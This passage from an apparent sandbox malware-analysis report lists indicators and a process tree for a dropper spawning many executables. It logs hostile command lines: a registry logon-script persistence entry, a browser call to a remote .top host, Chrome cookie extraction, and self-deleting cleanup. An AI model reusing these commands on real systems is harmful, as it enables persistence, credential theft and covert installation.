Token: SeDebugPrivilege	5028	AVqk1UPoSsbAvzi4L5Kuu6bC.exe
Token: SeDebugPrivilege	2120	WerFault.exe
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeDebugPrivilege	3176	2329176.exe
Token: SeDebugPrivilege	4408	WerFault.exe
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeShutdownPrivilege	2832
Token: SeCreatePagefilePrivilege	2832
Token: SeDebugPrivilege	4564	WerFault.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

4TS5KEf_GCWhHvczBXfd5Urj.tmp

pid process

4536 4TS5KEf_GCWhHvczBXfd5Urj.tmp

pid	process
4536	4TS5KEf_GCWhHvczBXfd5Urj.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup (18).exeDBYWgFzqSyRnTC2xtVxdSZPJ.exe

description	pid	process	target process
PID 3228 wrote to memory of 1264	3228	Setup (18).exe	Vmn4PVGj0R18eRXqQIBemdUg.exe
PID 3228 wrote to memory of 1264	3228	Setup (18).exe	Vmn4PVGj0R18eRXqQIBemdUg.exe
PID 3228 wrote to memory of 1264	3228	Setup (18).exe	Vmn4PVGj0R18eRXqQIBemdUg.exe
PID 3228 wrote to memory of 1244	3228	Setup (18).exe	wD5NwThcOmu4o3xMhUXyWYit.exe
PID 3228 wrote to memory of 1244	3228	Setup (18).exe	wD5NwThcOmu4o3xMhUXyWYit.exe
PID 3228 wrote to memory of 1244	3228	Setup (18).exe	wD5NwThcOmu4o3xMhUXyWYit.exe
PID 3228 wrote to memory of 3940	3228	Setup (18).exe	yoodz44Yg0ljcCtGfnfw3ZlY.exe
PID 3228 wrote to memory of 3940	3228	Setup (18).exe	yoodz44Yg0ljcCtGfnfw3ZlY.exe
PID 3228 wrote to memory of 3940	3228	Setup (18).exe	yoodz44Yg0ljcCtGfnfw3ZlY.exe
PID 3228 wrote to memory of 1280	3228	Setup (18).exe	q3k71AT3BZDEsXUrePQAIsLS.exe
PID 3228 wrote to memory of 1280	3228	Setup (18).exe	q3k71AT3BZDEsXUrePQAIsLS.exe
PID 3228 wrote to memory of 1280	3228	Setup (18).exe	q3k71AT3BZDEsXUrePQAIsLS.exe
PID 3228 wrote to memory of 1816	3228	Setup (18).exe	7D32Le47Ps_lp5bMpkU5RnGM.exe
PID 3228 wrote to memory of 1816	3228	Setup (18).exe	7D32Le47Ps_lp5bMpkU5RnGM.exe
PID 3228 wrote to memory of 1816	3228	Setup (18).exe	7D32Le47Ps_lp5bMpkU5RnGM.exe
PID 3228 wrote to memory of 2400	3228	Setup (18).exe	MjT1m_JgjTVfbcEbgFdw8igH.exe
PID 3228 wrote to memory of 2400	3228	Setup (18).exe	MjT1m_JgjTVfbcEbgFdw8igH.exe
PID 3228 wrote to memory of 2400	3228	Setup (18).exe	MjT1m_JgjTVfbcEbgFdw8igH.exe
PID 3228 wrote to memory of 1408	3228	Setup (18).exe	AVqk1UPoSsbAvzi4L5Kuu6bC.exe
PID 3228 wrote to memory of 1408	3228	Setup (18).exe	AVqk1UPoSsbAvzi4L5Kuu6bC.exe
PID 3228 wrote to memory of 1408	3228	Setup (18).exe	AVqk1UPoSsbAvzi4L5Kuu6bC.exe
PID 3228 wrote to memory of 3944	3228	Setup (18).exe	OswiwDLy8o9Ia_NYRV9VXqA9.exe
PID 3228 wrote to memory of 3944	3228	Setup (18).exe	OswiwDLy8o9Ia_NYRV9VXqA9.exe
PID 3228 wrote to memory of 3944	3228	Setup (18).exe	OswiwDLy8o9Ia_NYRV9VXqA9.exe
PID 3228 wrote to memory of 2716	3228	Setup (18).exe	H99IIYBCp415OLNLtdHnTFmS.exe
PID 3228 wrote to memory of 2716	3228	Setup (18).exe	H99IIYBCp415OLNLtdHnTFmS.exe
PID 3228 wrote to memory of 2716	3228	Setup (18).exe	H99IIYBCp415OLNLtdHnTFmS.exe
PID 3228 wrote to memory of 2724	3228	Setup (18).exe	bZJT82MkAWZQQp7_JaeQ1dSF.exe
PID 3228 wrote to memory of 2724	3228	Setup (18).exe	bZJT82MkAWZQQp7_JaeQ1dSF.exe
PID 3228 wrote to memory of 2724	3228	Setup (18).exe	bZJT82MkAWZQQp7_JaeQ1dSF.exe
PID 3228 wrote to memory of 2452	3228	Setup (18).exe	0caebW5jEXToU5eC3PMuq4f0.exe
PID 3228 wrote to memory of 2452	3228	Setup (18).exe	0caebW5jEXToU5eC3PMuq4f0.exe
PID 3228 wrote to memory of 2164	3228	Setup (18).exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
PID 3228 wrote to memory of 2164	3228	Setup (18).exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
PID 3228 wrote to memory of 2164	3228	Setup (18).exe	DBYWgFzqSyRnTC2xtVxdSZPJ.exe
PID 3228 wrote to memory of 1648	3228	Setup (18).exe	QHgwKa28V7P5sqyE2Sl0_hFF.exe
PID 3228 wrote to memory of 1648	3228	Setup (18).exe	QHgwKa28V7P5sqyE2Sl0_hFF.exe
PID 3228 wrote to memory of 1648	3228	Setup (18).exe	QHgwKa28V7P5sqyE2Sl0_hFF.exe
PID 3228 wrote to memory of 3108	3228	Setup (18).exe	hqxa5Mo59Wmnvff3zAY0Aghd.exe
PID 3228 wrote to memory of 3108	3228	Setup (18).exe	hqxa5Mo59Wmnvff3zAY0Aghd.exe
PID 3228 wrote to memory of 3108	3228	Setup (18).exe	hqxa5Mo59Wmnvff3zAY0Aghd.exe
PID 3228 wrote to memory of 2392	3228	Setup (18).exe	4yugMo4I2yJgvw_Kg9av9OCT.exe
PID 3228 wrote to memory of 2392	3228	Setup (18).exe	4yugMo4I2yJgvw_Kg9av9OCT.exe
PID 3228 wrote to memory of 2392	3228	Setup (18).exe	4yugMo4I2yJgvw_Kg9av9OCT.exe
PID 3228 wrote to memory of 192	3228	Setup (18).exe	D15mnp9yV3DSru0qxTrTPLC5.exe
PID 3228 wrote to memory of 192	3228	Setup (18).exe	D15mnp9yV3DSru0qxTrTPLC5.exe
PID 3228 wrote to memory of 192	3228	Setup (18).exe	D15mnp9yV3DSru0qxTrTPLC5.exe
PID 3228 wrote to memory of 196	3228	Setup (18).exe	MIcIvpI4I70jogh_7GmzX0Re.exe
PID 3228 wrote to memory of 196	3228	Setup (18).exe	MIcIvpI4I70jogh_7GmzX0Re.exe
PID 3228 wrote to memory of 196	3228	Setup (18).exe	MIcIvpI4I70jogh_7GmzX0Re.exe
PID 3228 wrote to memory of 1712	3228	Setup (18).exe	1QzI74oJk44h5pnSKCFUFrND.exe
PID 3228 wrote to memory of 1712	3228	Setup (18).exe	1QzI74oJk44h5pnSKCFUFrND.exe
PID 3228 wrote to memory of 1712	3228	Setup (18).exe	1QzI74oJk44h5pnSKCFUFrND.exe
PID 3228 wrote to memory of 4292	3228	Setup (18).exe	4TS5KEf_GCWhHvczBXfd5Urj.exe
PID 3228 wrote to memory of 4292	3228	Setup (18).exe	4TS5KEf_GCWhHvczBXfd5Urj.exe
PID 3228 wrote to memory of 4292	3228	Setup (18).exe	4TS5KEf_GCWhHvczBXfd5Urj.exe
PID 2164 wrote to memory of 4352	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	jooyu.exe
PID 2164 wrote to memory of 4352	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	jooyu.exe
PID 2164 wrote to memory of 4352	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	jooyu.exe
PID 2164 wrote to memory of 4376	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	md8_8eus.exe
PID 2164 wrote to memory of 4376	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	md8_8eus.exe
PID 2164 wrote to memory of 4376	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	md8_8eus.exe
PID 2164 wrote to memory of 4416	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	customer3.exe
PID 2164 wrote to memory of 4416	2164	DBYWgFzqSyRnTC2xtVxdSZPJ.exe	customer3.exe

C:\Users\Admin\AppData\Local\Temp\Setup (18).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (18).exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3228

C:\Users\Admin\Documents\H99IIYBCp415OLNLtdHnTFmS.exe
"C:\Users\Admin\Documents\H99IIYBCp415OLNLtdHnTFmS.exe"
2⤵
- Executes dropped EXE
PID:2716

C:\Users\Admin\Documents\H99IIYBCp415OLNLtdHnTFmS.exe
"C:\Users\Admin\Documents\H99IIYBCp415OLNLtdHnTFmS.exe"
3⤵
PID:9908

C:\Users\Admin\Documents\bZJT82MkAWZQQp7_JaeQ1dSF.exe
"C:\Users\Admin\Documents\bZJT82MkAWZQQp7_JaeQ1dSF.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2724

C:\Users\Admin\Documents\MjT1m_JgjTVfbcEbgFdw8igH.exe
"C:\Users\Admin\Documents\MjT1m_JgjTVfbcEbgFdw8igH.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2400

C:\Users\Admin\Documents\MjT1m_JgjTVfbcEbgFdw8igH.exe
C:\Users\Admin\Documents\MjT1m_JgjTVfbcEbgFdw8igH.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4920

C:\Users\Admin\Documents\0caebW5jEXToU5eC3PMuq4f0.exe
"C:\Users\Admin\Documents\0caebW5jEXToU5eC3PMuq4f0.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2452

C:\Users\Admin\AppData\Roaming\2329176.exe
"C:\Users\Admin\AppData\Roaming\2329176.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3176

C:\Users\Admin\AppData\Roaming\1029792.exe
"C:\Users\Admin\AppData\Roaming\1029792.exe"
3⤵
PID:2104

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
4⤵
- Executes dropped EXE
PID:4368

C:\Users\Admin\Documents\q3k71AT3BZDEsXUrePQAIsLS.exe
"C:\Users\Admin\Documents\q3k71AT3BZDEsXUrePQAIsLS.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1280

C:\Users\Admin\Documents\yoodz44Yg0ljcCtGfnfw3ZlY.exe
"C:\Users\Admin\Documents\yoodz44Yg0ljcCtGfnfw3ZlY.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3940

C:\Users\Admin\Documents\7D32Le47Ps_lp5bMpkU5RnGM.exe
"C:\Users\Admin\Documents\7D32Le47Ps_lp5bMpkU5RnGM.exe"
2⤵
- Executes dropped EXE
PID:1816

C:\Users\Admin\Documents\OswiwDLy8o9Ia_NYRV9VXqA9.exe
"C:\Users\Admin\Documents\OswiwDLy8o9Ia_NYRV9VXqA9.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3944

C:\Users\Admin\Documents\OswiwDLy8o9Ia_NYRV9VXqA9.exe
C:\Users\Admin\Documents\OswiwDLy8o9Ia_NYRV9VXqA9.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4904

C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe
"C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1408

C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe
C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe
3⤵
- Executes dropped EXE
PID:4884

C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe
C:\Users\Admin\Documents\AVqk1UPoSsbAvzi4L5Kuu6bC.exe
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5028

C:\Users\Admin\Documents\Vmn4PVGj0R18eRXqQIBemdUg.exe
"C:\Users\Admin\Documents\Vmn4PVGj0R18eRXqQIBemdUg.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1264

C:\Users\Admin\Documents\wD5NwThcOmu4o3xMhUXyWYit.exe
"C:\Users\Admin\Documents\wD5NwThcOmu4o3xMhUXyWYit.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1244

C:\Users\Admin\Documents\QHgwKa28V7P5sqyE2Sl0_hFF.exe
"C:\Users\Admin\Documents\QHgwKa28V7P5sqyE2Sl0_hFF.exe"
2⤵
- Executes dropped EXE
PID:1648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 660
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 700
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4408

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 740
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 840
3⤵
- Program crash
PID:3576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 1132
3⤵
- Program crash
PID:5628

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 1160
3⤵
- Program crash
PID:5676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 1124
3⤵
- Program crash
PID:6104

C:\Users\Admin\Documents\MIcIvpI4I70jogh_7GmzX0Re.exe
"C:\Users\Admin\Documents\MIcIvpI4I70jogh_7GmzX0Re.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:196

C:\Users\Admin\Documents\D15mnp9yV3DSru0qxTrTPLC5.exe
"C:\Users\Admin\Documents\D15mnp9yV3DSru0qxTrTPLC5.exe"
2⤵
- Executes dropped EXE
PID:192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 760
3⤵
- Program crash
PID:6024

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 816
3⤵
- Program crash
PID:5780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 852
3⤵
- Program crash
PID:6008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 856
3⤵
- Program crash
PID:6536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 964
3⤵
- Program crash
PID:1836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 940
3⤵
- Program crash
PID:6376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 996
3⤵
- Program crash
PID:4064

C:\Users\Admin\Documents\4yugMo4I2yJgvw_Kg9av9OCT.exe
"C:\Users\Admin\Documents\4yugMo4I2yJgvw_Kg9av9OCT.exe"
2⤵
- Executes dropped EXE
PID:2392

C:\Users\Admin\Documents\hqxa5Mo59Wmnvff3zAY0Aghd.exe
"C:\Users\Admin\Documents\hqxa5Mo59Wmnvff3zAY0Aghd.exe"
2⤵
- Executes dropped EXE
PID:3108

C:\Users\Admin\Documents\hqxa5Mo59Wmnvff3zAY0Aghd.exe
"C:\Users\Admin\Documents\hqxa5Mo59Wmnvff3zAY0Aghd.exe" -q
3⤵
- Executes dropped EXE
PID:4712

C:\Users\Admin\Documents\DBYWgFzqSyRnTC2xtVxdSZPJ.exe
"C:\Users\Admin\Documents\DBYWgFzqSyRnTC2xtVxdSZPJ.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2164

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
3⤵
- Executes dropped EXE
PID:4352

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:4248

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:4580

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
PID:10096

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
3⤵
- Executes dropped EXE
PID:4376

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
3⤵
- Executes dropped EXE
PID:4416

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:2436

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
4⤵
- Executes dropped EXE
PID:4332

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4416 -s 1316
4⤵
- Program crash
PID:4572

C:\Users\Admin\Documents\1QzI74oJk44h5pnSKCFUFrND.exe
"C:\Users\Admin\Documents\1QzI74oJk44h5pnSKCFUFrND.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Users\Admin\Documents\4TS5KEf_GCWhHvczBXfd5Urj.exe
"C:\Users\Admin\Documents\4TS5KEf_GCWhHvczBXfd5Urj.exe"
2⤵
- Executes dropped EXE
PID:4292

C:\Users\Admin\AppData\Local\Temp\is-BV598.tmp\4TS5KEf_GCWhHvczBXfd5Urj.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BV598.tmp\4TS5KEf_GCWhHvczBXfd5Urj.tmp" /SL5="$3019E,138429,56832,C:\Users\Admin\Documents\4TS5KEf_GCWhHvczBXfd5Urj.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4536

C:\Users\Admin\AppData\Local\Temp\is-O6ODQ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-O6ODQ.tmp\Setup.exe" /Verysilent
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3476

C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
5⤵
PID:2216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 792
6⤵
- Program crash
PID:2660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 868
6⤵
- Program crash
PID:1784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 956
6⤵
- Program crash
PID:5112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 1344
6⤵
- Program crash
PID:5404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 1360
6⤵
- Program crash
PID:4180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 1464
6⤵
- Program crash
PID:4180

C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
5⤵
- Executes dropped EXE
PID:2484

C:\Users\Admin\AppData\Local\Temp\is-5OTOQ.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5OTOQ.tmp\Inlog.tmp" /SL5="$102E0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2104

C:\Users\Admin\AppData\Local\Temp\is-7MNQ9.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-7MNQ9.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
7⤵
PID:1324

C:\Users\Admin\AppData\Local\Temp\is-S4I7U.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S4I7U.tmp\Setup.tmp" /SL5="$104E2,17369384,721408,C:\Users\Admin\AppData\Local\Temp\is-7MNQ9.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
8⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CQ3AD.tmp\{app}\microsoft.cab -F:* %ProgramData%
9⤵
PID:5164

C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-CQ3AD.tmp\{app}\microsoft.cab -F:* C:\ProgramData
10⤵
PID:6472

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
9⤵
PID:7800

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
10⤵
PID:788

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
9⤵
PID:7624

C:\Users\Admin\AppData\Local\Temp\is-CQ3AD.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-CQ3AD.tmp\{app}\vdi_compiler"
9⤵
PID:2072

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-CQ3AD.tmp\{app}\vdi_compiler.exe"
10⤵
PID:8632

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
11⤵
- Runs ping.exe
PID:5684

C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
9⤵
PID:9148

C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
5⤵
- Executes dropped EXE
PID:3240

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629273114 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
6⤵
PID:6552

C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
5⤵
PID:3340

C:\Users\Admin\AppData\Local\Temp\is-203O2.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-203O2.tmp\WEATHER Manager.tmp" /SL5="$102F8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
6⤵
PID:1760

C:\Users\Admin\AppData\Local\Temp\is-F5RD9.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-F5RD9.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
7⤵
PID:5800

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-F5RD9.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-F5RD9.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629273115 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
8⤵
PID:7384

C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
5⤵
- Executes dropped EXE
PID:1960

C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
5⤵
- Executes dropped EXE
PID:2300

C:\Users\Admin\AppData\Local\Temp\is-8O49Q.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8O49Q.tmp\VPN.tmp" /SL5="$102F6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
6⤵
PID:5056

C:\Users\Admin\AppData\Local\Temp\is-7R8R7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-7R8R7.tmp\Setup.exe" /silent /subid=720
7⤵
PID:4228

C:\Users\Admin\AppData\Local\Temp\is-5GQS7.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5GQS7.tmp\Setup.tmp" /SL5="$20464,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-7R8R7.tmp\Setup.exe" /silent /subid=720
8⤵
PID:2396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
9⤵
PID:5508

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
10⤵
PID:7336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
9⤵
PID:7648

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
10⤵
PID:7296

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
9⤵
PID:8452

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
9⤵
PID:5720

C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
5⤵
PID:3744

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:6512

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:5624

C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
5⤵
PID:496

C:\Users\Admin\AppData\Local\Temp\is-AEK2V.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AEK2V.tmp\MediaBurner2.tmp" /SL5="$30300,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
6⤵
PID:5124

C:\Users\Admin\AppData\Local\Temp\is-0BTA5.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-0BTA5.tmp\3377047_logo_media.exe" /S /UID=burnerch2
7⤵
PID:5948

C:\Program Files\Windows Mail\SWPFFCTIHD\ultramediaburner.exe
"C:\Program Files\Windows Mail\SWPFFCTIHD\ultramediaburner.exe" /VERYSILENT
8⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\is-B71VM.tmp\ultramediaburner.tmp
